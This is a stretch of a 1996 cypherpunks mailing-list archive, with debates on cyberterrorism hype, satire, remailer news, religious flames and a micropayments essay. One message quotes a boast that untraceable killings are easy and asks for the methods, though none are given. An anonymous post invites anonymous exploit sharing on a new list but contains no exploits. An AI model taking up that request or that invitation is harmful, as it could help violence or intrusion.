> collapse of that strong government, or the immediate tendency of it to be 
> replaced with dictator wannabes?
> In other words, if a "strong government" could be brought down with a 
> guarantee that nobody would be able to even begin to replace it, might that 
> not be an entirely different matter?

	Notice the use of the word "Collapsing" it was used to refer to a
quick removal of rule/authority.
	I am no proponet of today's system, but no reasonable replacement
has been suggested. Yours included. The problem I have with your system is
basically the same problem I have with todays. Tyranny of the masses and a
system where emotion can be drummed up to kill an idea (or person) where
reason _should_ prevail. 

> >Society holds itself together in large part not
> >because of the rule of law, but becaue most people want it to. 
> 
> Doesn't this statement contradict the previous statement you made?  If 
> there's "chaos" perhaps that's merely because a small group of people is 
> trying to take control.  Most people want peace, but it can be disturbed by 
> a minority.

	In the situation where a small group of people do something to
throw the system into chaos, the rules that stop the minority from running
amuck are no longer in place. In that situation, people get scared. Fear
is condusive to rational thinking. When fear takes over people tend to
react emotionally/instinctively. This would (I think, I haven't done the
research to back this up) tend to cause people to back someone who
promises a return to the previous stability (look at Russia).


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 11 Jun 1996 18:16:36 +0800
To: Dale Drew <ddrew@mci.net>
Subject: Re: Terrorism Hysteria on the Net
In-Reply-To: <199606110345.XAA25894@druid.reston.mci.net>
Message-ID: <Pine.LNX.3.93.960610225538.922V-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 10 Jun 1996, Dale Drew wrote:
> At 07:21 PM 6/10/96 -0500, snow wrote:
> >On Wed, 5 Jun 1996, John Young wrote:
> >> "You bring me a select group of hackers and within 90 days I'll bring this
> >> country to its knees, " says Jim Settle, retired director of the FBI's
> >> computer crime squad. 
> >	Give me 15 well trained soldiers(near special forces level) and I
> >can do it in less than 60 days. Without touching a computer. 
> To understand where "They" think they are coming from, you have to compare
> Apples-to-Apples.  The concern is the medium of choice; the Internet and it's
> high availability of anonymity, coupled with its access to large amounts of
> computer systems available via one virtual channel.

	Preaching to the choir, but once again it is a case of nothing
new. The potential for economic terrorism is not significantly larger
given the existance of the internet than it was before. This is what needs
to constantly be drummed into the technically dis-inclined, that the same
problems exists off the net that exist ON the net.
 
> A well orchestrated and well researched attack by the right folk, as the thought
> process goes, could in-fact, potentially affect large amounts of critical
> computer systems within a short period of time. And while the government
> has inroads available to identify potential physical terrorists threats,
> they do not feel as prepared for the virtual ones.

	I would think that shutting down power to New York City for more
than a couple of days would pretty much throw the economy into a fit. 

	I would go so far as to say that you can cause MORE havoc in the
physical arena than the virtual. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: enquirer@alpha.c2.org
Date: Tue, 11 Jun 1996 19:12:42 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Enquirer
Message-ID: <199606110631.XAA25212@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain




			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


The Enquirer's Public Service Award for this month goes to ABC Evening
News, which, after noting that 25% of America's children have access to
bomb-making instructions via the Internet, proceeded to provide those
instructions to the 75% without Internet access.  ABC News President Roone
Arledge defended the decision to describe the explosives made from commonly
available household ingredients, stating that "In the interest of public
safety, we omitted the final instruction to 'light the fuse and run like
hell'."

The Cypherpunk Academy of Codes and Cyphers recently announced a new
nomination for the Perry Award.  The nomination for this prestigious award,
given to the cypherpunk who has done the most in the past year to increase
the S/N ratio of the list, goes to Alex de Joode, for shutting down the
famed Hacktic remailer and refusing to confirm or deny that the reason was
actually the fact that the entire staff of Hacktic, Int. has recently
converted to the Church of $cientology.  The resulting rumors set of a wave
of paranoia on the list regarding the future of the remailer network, and
resulted in a few cypherpunks actually writing code for the first time in
recent memory.  Mr. de Joode, interviewed while peddling e-meter software
for $10,000 in Amsterdam's red light district, refused all comment. 

Curtis Sliwa had to return the $10,000 today when it was discovered that
the .gif of "a woman's genitals nailed to a board" that the CyberAngels
presented to the ACLU lawyers in the CDA appeal hearing was really a
photo of his wife Lisa's labial piercings.

Rich Graves finally got his Doctor of Divinity degree from the Universal
Life Church, and requests that from now on, list members refer to him
as "DR. Fucking Statist".

Sotheby's Auction House today announced that the famed "Black Window"
Java applet signed by Marianne Mueller has been sold for $2,500,000.
The rare applet, which can damage hard drive files even though it had
been signed and certified as "completely secure", was purchased by a
certain Wall Street Computer Security Consultant who wishes to remain
anonymous, and who placed his winning bid via anonymizer@c2.org.

Leon Panetta belatedly admitted today that hidden away in the small
print on page 1,237 of the Administration's latest "Law Enforcement
Access to Encrypted Internet Traffic" proposal, otherwise known as
Clipper III, was a section on the new "Republican Members of Congress FBI
File Escrow Service".

Logan promises to never again try to operate his Mac mail software
immediately after one of those late-night Beltway cocktail parties.

Former President Jimmy Carter was vindicated today when Jim Bell
announced that the strange markings on recently deceased ex-CIA Director
William Colby's canoe were indeed the result of rabbit bites.  

Sandy Sandfort's tax avoidance consulting service collapsed today when it
was discovered that tax avoiders weren't any better at chaining remailers
that the average Windows95 user.

Next in the Enquirer:  Tim May's first interview since the Catholic Jihad's
announcement of their "Death Contract" with Jim Bell.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Drew <ddrew@mci.net>
Date: Tue, 11 Jun 1996 17:11:10 +0800
To: snow <jya@pipeline.com>
Subject: Re: Terrorism Hysteria on the Net
Message-ID: <199606110345.XAA25894@druid.reston.mci.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:21 PM 6/10/96 -0500, snow wrote:
>On Wed, 5 Jun 1996, John Young wrote:

>> "You bring me a select group of hackers and within 90 days I'll bring this
>> country to its knees, " says Jim Settle, retired director of the FBI's
>> computer crime squad. 
>
>	Give me 15 well trained soldiers(near special forces level) and I
>can do it in less than 60 days. Without touching a computer. 
>

To understand where "They" think they are coming from, you have to compare
Apples-to-Apples.  The concern is the medium of choice; the Internet and it's
high availability of anonymity, coupled with its access to large amounts of
computer systems available via one virtual channel.

A well orchestrated and well researched attack by the right folk, as the thought
process goes, could in-fact, potentially affect large amounts of critical
computer systems within a short period of time. And while the government
has inroads available to identify potential physical terrorists threats,
they do not feel as prepared for the virtual ones.

===============================================================
Dale Drew                                MCI Telecommunications
Manager                                    internetMCI Security
                                                    Engineering
Voice:  703/715-7058                    Internet: ddrew@mci.net
Fax:    703/715-7066                MCIMAIL: Dale_Drew/644-3335





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Tue, 11 Jun 1996 18:54:40 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <m0uTKd3-00035bC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage Age-13 Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> President of Revolution Software
Quote- Does whiskey count as beer? -Homer Simpson          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 11 Jun 1996 19:31:30 +0800
To: cypherpunks@toad.com
Subject: [NOISE] "Fascism is corporatism"
Message-ID: <199606110717.AAA22004@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 AM 6/9/96 -0700, Rich Graves wrote:
> All you're doing is blathering on with some
> anti-intellectual lumpenlibertarian claptrap that tries to smear anything
> you disagree with as tantamount to fascism. 
> 
> [...]
>
> Heidegger only really supported Nazism from 1933-34; in the 40's and
> thereafter, he referred to Nazism as a disease.
>
> [...]
>
> any attempt to smear them as a bunch of Nazis is ludicrous
>
> [...]
>
> Your foaming-mouth projections on people who disagree with you are 
> laughable.

During the war Heidegger wore full Nazi regalia, and compelled his students to 
participate in fascist rallies which he led.   He consistently claimed that his
philosophy led logically to fascism.  See "A normal Nazi" by Thomas Sheehan,
in the New York Review of Books, early 1993.  Also in the same journal see a 
dozen of the leading lights of the academic left enthusiastically supporting 
a murderous Nazi and the ideas that he loudly proclaimed were fascist ideas.

You revised history in favor of a couple of fascist philosophers, one 
of whom sent one of his former teacher to one of Hitler's concentration 
camps. See the following URLs for the real history.
http://www.wavefront.com/~contra_m/cm/reviews/cm13_rev_heidegger.html
http://www.inlink.com/~dhchase/heidig.htm

You also revised history in favor of a system of ideas that has in the past 
been used to justify and organize the deaths of millions of people, and
which has recently in America been used to justify and organize mild but 
widespread repression, (including the PC laws that you recently denied 
existed), the system of ideas that many people reasonably argue has been
recently been used to justify and organize the narrowly focused severe 
repression, including government murder of women and children, that we 
have recently seen in America (which you recently denied was the intended
outcome of government policy).

And *you* are calling *me* an extremist.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Tue, 11 Jun 1996 19:44:50 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Slander of Catholic Church
In-Reply-To: <ade1e9960d021004dcf7@[205.199.118.202]>
Message-ID: <Pine.3.89.9606110041.A8374-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 10 Jun 1996, Timothy C. May wrote:

<snip>...

> 
> --Cardinal Timothy May
> 
> (Who believes all cults and religions are basically the same shuck and
> jive, and who thinks the "Church of Scientology" is actually a little bit
> less foolish that the Church of Mormon, with its "baptism of dead
                        ^^^^^^^^^^^^^^^^

It's The Church of Jesus Christ of Latter Day Saints.

If your going to criticize it, at least get the name right.

> ancestors" into the Church, the funny underwear people have to secretly
                                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Do you wear yours on the outside like Madonna?

> wear, etc. However, I have great respect for the practical tactics of the
> Mormons, and no respect for the day to day behavior of the CoS.)
> 

Frankly, I think this discussion needs to be put back into 
alt.flame.the.religion.of.your.choice. It's bad enough to watch a 
discussion on anonymous transactions devolve into useless drivel on whale 
ownership and the questionable philisophical ruminations of a Piled 
Higher and Deeper, without flinging this prarrie muffin on the pile too.

...Paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 11 Jun 1996 19:46:34 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: InfoWar and a.r.s
In-Reply-To: <199606102213.PAA28725@netcom7.netcom.com>
Message-ID: <Pine.GUL.3.93.960611001504.26593C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 10 Jun 1996, Bill Frantz wrote:

> One question to ponder is whether the a.r.s war will perform the same role
> as the Spanish Civil War vs. WW2.  Will we see newsgroup war expand to
> other news groups?  I would think a few of the .culture.* groups could be
> candidates.

Already happened. That's why soc.genealogy.african went moderated a few
months ago. The people in soc.culture.jewish deal with it by posting a
killfile FAQ regularly. Looks like soc.culture.latin-american, which I
followed for academic reasons three years ago, just gave up, splitting into
country-specific groups that are moderated. Pity.

alt.slack beat them off because, well, they're so much smarter and funnier
than any troller. :-)

Some (supposedly) closed mailing lists are openly talking about a vertical
spam of alt.revisionism. Someone new to alt.revisionism might think it has
already happened, but in fact the group is eminently readable and productive
for both sides if you killfile just two people, and followups to their
articles (three if you count the current incarnation of Serdar Argic, who
should be in everyone's global killfile). 

The general mood in news.groups is tilting towards at least robo-moderation
(posts handled by an automatic script that can have a twit filter). I think
it's a shame.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 11 Jun 1996 18:26:21 +0800
To: cypherpunks@toad.com
Subject: [NOISE] whitehouse queries files on political enemies
Message-ID: <199606110558.BAA21396@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 10 Jun 96 at 13:21, Vladimir Z. Nuri wrote:

> what goes around comes around..
> this reminds me of the old stories of Nixon and the various NSA
> domestic programs mentioned by Bamford ("Puzzle Palace")
> 
> 
> - ------- Forwarded Message

Old news, actually. It came over the wire Firday night.

Can't think of anything about it relevant to crypto at the moment...

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 11 Jun 1996 18:57:00 +0800
To: Peter Trei <trei@process.com>
Subject: [more noise] Re: [NOISE] I swear I am not making this up.
In-Reply-To: <199606101409.HAA21056@toad.com>
Message-ID: <Pine.3.89.9606110239.A21446-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 10 Jun 1996, Peter Trei wrote:

> >#3: Create a newsgroup for discussion and promotion of Aryan music. 
> [...]
> You mean those wonderful ragas and songs from the Vedas, don't you?
> I ust *love* sitar music.
 ;-)
> Check out The Aryan Pages at http://www.cs.man.ac.uk/~pateld/aryan_dir/aryan.html

Om, that reminds me,
ObCryptolinguisticsPunks: Did anyone know Iranian and Aryan are synonyms?
I have always been puzzled as to why nazis are so in love with my ethnic 
group. Very strange.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Tue, 11 Jun 1996 22:35:11 +0800
To: Mixmaster Mailing List <alt.privacy.anon-server@myriad.alias.net
Subject: New type2.list/pubring.mix (revisited)
Message-ID: <Pine.NEB.3.93.960611053615.27871B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	The corrected (downed remailers deleted) type2.list/pubring.mix
combination is available on jpunix.com. This list now contains only
remailers that have responded to pings sent out by myself and by Raph. 
I'll automate this shortly to insure that the remailers on the list
actually respond to traffic. 

	Apologies to ecafe for saying it was down. It was poor eysight on
my part.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBMb1PQ1OTpEThrthvAQHn7gP4rHjupKUM4hWPsbFIxdXWk09KdEZLbpK3
uumHpAlApXfu7n9umOG1evxp9SRy9yUg3PvtV5pHtMGcebv8ngpQEzDekC55RCBz
Rghon7Rqknte+9eRbpbqhq1e/LAzebxwJv+vRSOkYEOmiq6KWdhQ0LZyGjV1VfHA
D/eWCOf2ig==
=w/xe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)hackerpunks-owner@alpha.c2.org
Date: Tue, 11 Jun 1996 19:15:44 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT: HACKERPUNKS MAILING LIST
Message-ID: <199606110351.FAA03834@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



                      H  A  C  K  E  R  P  U  N  K  S  
                       "Obscurity through Security!"


Hi! We are delighted to announce a new mailing list, Hackerpunks! This list
is for serious folks who know stuff about computers _AND_ want to keep
their privacy. The submission address is an anonymous alias,
hackerpunks@alpha.c2.org. It is anonymous because _I_ want to keep my
privacy and do NOT want to answer stupid questions. To further _your_
privacy, we can subscribe ONLY anonymous aliases user_name@alpha.c2.org.
Mailing list messages will be forwarded to your alpha.c2.org adresses 
through anonymous remailers.
.p
This list is UNMODERATED. Due to our organization, we are unable to 
find out your true identity, and you are unable to find out where
our list-bot resides. So - you can now have free discussion about all
exploits and great hacks! Just use remailers and be safe...
.p
Remember i) no one can find out where the list resides ii) nobody can
find out that your alpha.c2.org account is subscribed to Hackerpunks
iii) nobody can find out who hides behind alpha.c2.org accounts
iv) nobody can find out that you are using alpha.c2.org aliases.
.p
Everything goes as long as it is about hacking. We shall decide 
later whether we want to keep non-computer hacking discussions in this
list or make another one. MODERATE FLAMAGE ONLY!
.p
Since remailers are used all the way from you to the list-bot and back,
the time for your messages to reach subscribers will be invariably
longer. You've gotta pay for security. Hackers must be patient!
.p
See our .sig for instructions; get premail for Unix or Private Idaho for
Windows, get an anonymous account at alpha.c2.org, and subscribe!
.p
All subscriptions and submissions NOT originating from alpha.c2.org will
be AUTOMATICALY REJECTED. That will save you YOUR OWN BUTT if you 
mistakenly submit a non-anonymous message.
.p
See ya! Schwartau, join us if you have something real to say (unlikely)!
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
H A C K E R P U N K S   M A I L I N G   L I S T  hackerpunks@alpha.c2.org
Send your requests to [un]subscribe  to hackerpunks-owner@alpha.c2.org
Only nyms from @alpha.c2.org may subscribe and post to this list.
See http://www.c2.org/anon.phtml, http://www.c2.net/~raph/premail
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Drew <ddrew@mci.net>
Date: Wed, 12 Jun 1996 03:39:01 +0800
To: snow <ddrew@mci.net>
Subject: Re: Terrorism Hysteria on the Net
Message-ID: <199606111102.HAA26811@druid.reston.mci.net>
MIME-Version: 1.0
Content-Type: text/plain




I think we are in violent agreement....

The item of issue, between physical and virtual terrorism attacks 
is the  fact the government either is, or wants to give the distinct 
perception that they are, ill-prepared to counter for the types of 
potentials wide-spread Internet-based virtual attacks.  And that the  
intelligence channels they have in place to detect possible movement 
of physical attacks may not fit the "Internet" model.

In addition, the US legal system is ill-prepared to deal with the
prosecutory issues surrounding this type of "terrorism".

===============================================================
Dale Drew                                MCI Telecommunications
Manager                                    internetMCI Security
                                                    Engineering
Voice:  703/715-7058                    Internet: ddrew@mci.net
Fax:    703/715-7066                MCIMAIL: Dale_Drew/644-3335


At 11:02 PM 6/10/96 -0500, snow wrote:
>On Mon, 10 Jun 1996, Dale Drew wrote:
>> At 07:21 PM 6/10/96 -0500, snow wrote:
>> >On Wed, 5 Jun 1996, John Young wrote:
>> >> "You bring me a select group of hackers and within 90 days I'll bring this
>> >> country to its knees, " says Jim Settle, retired director of the FBI's
>> >> computer crime squad. 
>> >	Give me 15 well trained soldiers(near special forces level) and I
>> >can do it in less than 60 days. Without touching a computer. 
>> To understand where "They" think they are coming from, you have to compare
>> Apples-to-Apples.  The concern is the medium of choice; the Internet and it's
>> high availability of anonymity, coupled with its access to large amounts of
>> computer systems available via one virtual channel.
>
>	Preaching to the choir, but once again it is a case of nothing
>new. The potential for economic terrorism is not significantly larger
>given the existance of the internet than it was before. This is what needs
>to constantly be drummed into the technically dis-inclined, that the same
>problems exists off the net that exist ON the net.
> 
>> A well orchestrated and well researched attack by the right folk, as the
thought
>> process goes, could in-fact, potentially affect large amounts of critical
>> computer systems within a short period of time. And while the government
>> has inroads available to identify potential physical terrorists threats,
>> they do not feel as prepared for the virtual ones.
>
>	I would think that shutting down power to New York City for more
>than a couple of days would pretty much throw the economy into a fit. 
>
>	I would go so far as to say that you can cause MORE havoc in the
>physical arena than the virtual. 
>
>
>Petro, Christopher C.
>petro@suba.com <prefered for any non-list stuff>
>snow@crash.suba.com
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 11 Jun 1996 23:44:00 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <Pine.LNX.3.93.960610205205.922M-100000@smoke.suba.com>
Message-ID: <gaVcPD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


snow <snow@smoke.suba.com> writes:
...
> 	It is almost ridicoulously simple to kill someone in a relatively
> untraceable fashion. Any person of average intelligence can do a little
> research (say about 3 hours at a decent (non-chicago) library) and spend
> an hour or two in thought and come up with a way to target a non- to
> moderately public figure with out getting caught.
> 	I can give you 4 right off the top of my head that have a
> reasonable chance of sucess, and very little chance of discovery.

Please do - thank you.

With purely academic interest,

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Wed, 12 Jun 1996 00:35:16 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: Slander of Catholic Church
In-Reply-To: <Pine.3.89.9606110041.A8374-0100000@netcom13>
Message-ID: <Pine.LNX.3.91.960611082225.787A-100000@user1.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain



      Tim ,
          You should stick to your own religion and not criticize other 
peoples. It is unforunate that the esteem that I once felt for you is 
dwindling because of your anti-Mormon trash. Perhaps you do not realise 
that some people take more than an academic interest in their religion 
;this is unforunate . It is pitiful.You are becomeing the ugly 
American that foreigners hate; always having an opinion about everything.
                               moroni





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 12 Jun 1996 08:25:56 +0800
To: cypherpunks@toad.com
Subject: Re: Slander of Catholic Church
In-Reply-To: <Pine.LNX.3.91.960611082225.787A-100000@user1.scranton.com>
Message-ID: <199606111558.IAA21479@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Joseph Smith hallucinates again and writes:

> It is unforunate that the esteem that I once felt for you is 
> dwindling because of your anti-Mormon trash. Perhaps you do not realise 
> that some people take more than an academic interest in their religion 
> ;this is unforunate.

If people want to believe in a religion which combines the best features 
of anthropomorphic sky-God worship with a UFO contactee cult, that is their
Constitutional right, giggling from the audience notwithstanding. 

I believe it was Thomas Jefferson who said that the voluminous amount of
theological writings by Christian scholars existed only because "nonsense
can never be explained."  I tend to concur.

Most religious doctrine is just a lot of energized enthusiasm.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 12 Jun 1996 07:58:37 +0800
To: cypherpunks@toad.com
Subject: Re: USS_hit
Message-ID: <199606111637.JAA06542@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:58 PM 6/11/96 GMT, John Young wrote:
>   6-11-96. FiTi: 
> 
>   "US squares up to cyberterrorists." 
> 
>      Until recently, the concept of "information warfare" has 
>      been widely dismissed as alarmist rhetoric and viewed as 
>      "post Cold War hysteria" generated by those with an 
>      interest in maintaining the vast US intelligence 
>      apparatus. But the potential use of computer networks to 
>      undermine public confidence,

The government is doing an excellent job `"undermining public confidence" 
all by itself!


 >disrupt essential services,

"essential" in whose opinion?

 
>      play havoc with the economy 

Like maybe massive deficit spending, high taxes, etc for decades?

>or damage military 
>      capabilities is now being taken seriously in Washington. 

How about "damage military NEEDS"?



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 11 Jun 1996 20:13:30 +0800
To: Cypherpunks@toad.com
Subject: A guide to self control (Was funny underwear)
Message-ID: <199606110758.JAA15624@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


  A Guide to Self-Control
 
  Subject: Steps in Overcoming Masterbation
 
 Excerpt from a Mormon missionary guide, circa 1970: Steps in
 Overcoming Masterbation, Mark E. Petersen

   1. Never touch the intimate parts of your body except during normal
       toilet processes.

   2. If you are associated with other persons having this same
      problem, YOU MUST BREAK OFF THEIR FRIENDSHIP. Never associate
      with other people having the same weakness. Don't suppose that
      two of you will quit together, you never will. You must get away
      from people of that kind. Just to be in their presence will keep
      your problem foremost in your mind. The problem must be taken OUT
      OF YOUR MIND for that is where it really exists. Your mind must
      be on other and more wholesome things.

   3. When in bed, if that is where you have your problem for the most
      part, dress yourself for the night so securely that you cannot
      easily touch your vital parts, and so that it would be difficult
      and time consuming for you to remove those clothes. By the time
      you started to remove protective clothing you would have
      sufficiently controlled your thinking that the temptation would
      leave you.

   4. If the temptation seems overpowering while you are in bed, GET
      OUT OF BED AND GO INTO THE KITCHEN AND FIX YOURSELF A SNACK, 
      even  if it is in the middle of the night, and even if you are not
      hungry, and despite your fears of gaining weight. The purpose
      behind this suggestion is that you GET YOUR MIND ON SOMETHING
      ELSE. You are the subject of your thoughts, so to speak.

   5. Never read pornographic material. Never read about your problem.
      Keep it out of mind. Remember -- "First a thought, then an act."
      The thought pattern must be changed. You must not allow this
      problem to remain in your mind. When you accomplish that, you
      soon will be free of the act.

   6. Pray. But when you pray, don't pray about this problem, for that
      will tend to keep [it] in your mind more than ever. Pray for
      faith, pray for understanding of the Scriptures, pray for the
      Missionaries, the General Authorities, your friends, your
      families, BUT KEEP THE PROBLEM OUT OF YOUR MIND BY NOT 
      MENTIONING  IT EVER -- NOT IN CONVERSATION WITH OTHERS, 
      NOT IN YOUR PRAYERS.  KEEP IT _OUT_ of your mind!

   7. Be outgoing and friendly. Force yourself to be with others and
      learn to enjoy working and talking to them. Use principles of
      developing friendships found in books such as _How to Win Friends
      and Influence People_ by Dale Carnegie.

   8. Make a pocket calendar for a month on a small card. Carry it with
      you, but show it to no one. If you have a lapse of self control,
      color the day black. Your goal will be to have _no black days_.
      The calendar becomes a strong visual reminder of self control and
      should be looked at when you are tempted to add another black
      day. Keep your calendar up until you have at least three clear
      months.

   9. In the field of psychotherapy there is a very effective technique
      called _aversion therapy_. When we associate or think of
      something very distasteful with something which has been
      pleasurable, but undesirable, the distasteful thought and feeling
      will begin to cancel out that which was pleasurable. If you
      associate something very distasteful with your loss of
      self-control it will help you to stop the act. For example, if
      you are tempted to masturbate, think of having to bathe in a tub
      of worms, and eat several of them as you do the act.

  10. Keep your bladder empty. Refrain from drinking large amounts of
       fluids before retiring.

  11. Reduce the amount of spices and condiments in your food. Eat as
       lightly as possible at night.

  12. Avoid people, situations, pictures or reading materials that
       might create sexual excitement.

  13. It is sometimes helpful to have a physical object to use in
       overcoming this problem. A Book of Mormon, firmly held in hand,
       even in bed at night has proven helpful in extreme cases.

  14. In very severe cases it may be necessary to tie a hand to the bed
       frame with a tie in order that the habit of masturbating in a
       semi-sleep condition can be broken.

  15. Do not let yourself return to any past habit or attitude patterns
       which were part of your problem. Satan Never Gives Up. Be calmly
       and confidently on guard. Keep a positive mental attitude. You
       can win this fight! The joy and strength you will feel when you
       do will give your whole life a radiant and spiritual glow of
       satisfaction and fulfillment.

--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Wed, 12 Jun 1996 04:19:18 +0800
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: HACKERPUNKS MAILING LIST
In-Reply-To: <199606110351.FAA03834@basement.replay.com>
Message-ID: <96Jun11.101251edt.10956@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


I don't have a C2 account, and don't really want to pay for one.
I trust someone will put the hackerpunks archives on the web so
the rest of us can read them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stephan Vladimir Bugaj" <stephan@studioarchetype.com>
Date: Wed, 12 Jun 1996 11:05:18 +0800
To: cypherpunks@toad.com
Subject: Micropayments are Crap
In-Reply-To: <199606060257.TAA16018@netcom.netcom.com>
Message-ID: <v03006f04ade3579bc415@[204.162.75.169]>
MIME-Version: 1.0
Content-Type: text/plain


As far as I'm concerned Micropayments as appealing to me as Data Mining.  I
certainly see how my wallet would benefits from being on the receiving end of
the money and/or information, but I can also clearly see the detrements of
being the one whose money and information was "automagically" being
appropriated. The technical concerns are many, any secure system can be
broken by someone with enough skill and resources, but the social concerns are
more difficult to address. For example, it's great if the browser logs
client side transactions that can't be spoofed because the wallet knows where
it sent money, but try convincing a vendor who is already suspicious of
'all this computer stuff' that you really sent them some money and a savvy
hacker pilfered it all - log or no log.

Setting a micropayment enabled web browser to automatically grant approval to
payments of $.02/action may seem reasonable, but it depends on what the vendor
has decided constitues an action.  If somone charged $.02/nanosecond for
retreiving shareware from an FTP library, and my browser was set to accept this
as reasonable based on the fact that it was $.02/action, I would have no idea
what an exhorbitant rate I was paying for access until my 'wallet' was emptied
by downloading the README file... this kind of rate swindling already goes on
in the telephone industry and would be even easier on a system like the
internet
where people habitually connect with unknown parties to check out the
offerings.
This doesn't happen with phones (well, not as much).  The virtual nomadness of
wandering the net leaves a lot of people - even otherwise careful people -
vulnerable to rate traps.

Micropayment proponents are incredibly fond of the proposition that software
could be leased on a usage time basis from a centralized server, and people
could also rent time on the servers' CPUs.  Sounds an awful lot like the
mainframe days to me.  I see plenty of ways in which this benefits the
vendor
(greater control over distribution, centrailzed revision/upgrade distribution,
greater profits over one-time sales, etc.), but no ways in which this benefits
the user.  Especially the power user.  I'm certainly not going to rent time
on a compiler or image editing program every single time I want to do some
work.
It took the industry long enough to get PCs and workstations to the speeds
they're at today so people could do their own work on their own machines to
go back to waiting in a queue for time on a centralized system so you can
have the honor of paying someone a lot of money to run your job.  As a
programmer, I can
see how I could make a fat chunk of change by bilking people through metered
software usage, but as a software consumer it seems like a rotten idea.  One
effect it would have, however, would be an exponential increase in the quality
and quantity of software available from the Free Software Foundation and
other similar groups as people like myself fled en-masse from commercial
software to a
system where we knew what we were getting into ahead of time.

The other rotten part of this idea, of course, is the irritating lag times
involved with trying to run distributed software (especially poorly
distributed
software, and especially on an overloaded network infrastructure).

